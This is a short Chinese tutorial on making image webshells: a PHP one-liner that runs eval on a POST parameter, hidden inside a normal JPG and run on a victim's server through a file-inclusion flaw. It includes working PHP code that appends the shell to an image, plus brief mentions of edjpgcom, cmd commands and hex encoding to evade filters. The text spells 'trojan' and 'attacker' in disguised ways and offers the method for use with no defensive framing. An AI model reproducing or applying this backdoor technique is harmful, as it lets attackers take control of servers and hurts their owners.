制作马图
方式一
一句话mu马图片是指将一句话mu马代码隐藏在正常的图片文件中,使得该图片文件成为一个mu马文件。公鸡者可以通过上传该图片文件到受害者的服务器上,并利用文件包含漏洞来执行该mu马代码,从而获取服务器的控制权。
下面是一个生成一句话mu马图片的示例代码:
<?php
$code = '<?php eval($_POST["cmd"]); ?>'; // 一句话马代码
$filename = 'shell.php'; // 生成的马文件名
$image = 'pic.jpg'; // 正常的图片文件名
$webshell = 'webshell.jpg'; // 生成的一句话马图片文件名
// 生成一句话马文件
file_put_contents($filename, $code);
// 将一句话mu马文件和正常的图片文件合并成一张图片马
$data = file_get_contents($image);
$data .= file_get_contents($filename);
file_put_contents($webshell, $data);
// 删除一句话马文件
unlink($filename);该代码将一句话mu马代码存储在变量$code中,将生成的mu马文件名存储在变量$filename中,将正常的图片文件名存储在变量$image中,将生成的一句话mu马图片文件名存储在变量$webshell中。然后,该代码将一句话mu马文件和正常的图片文件合并成一张图片马,并将其保存为文件webshell.jpg。最后,该代码删除一句话mu马文件。
方式二
利用脚本edjpgcom
将图片投入到edjpgcom脚本,然后写入一句话马
方式三
利用cmd命令
方式四
利用16进制编写一句话,有更好的绕过安全过滤
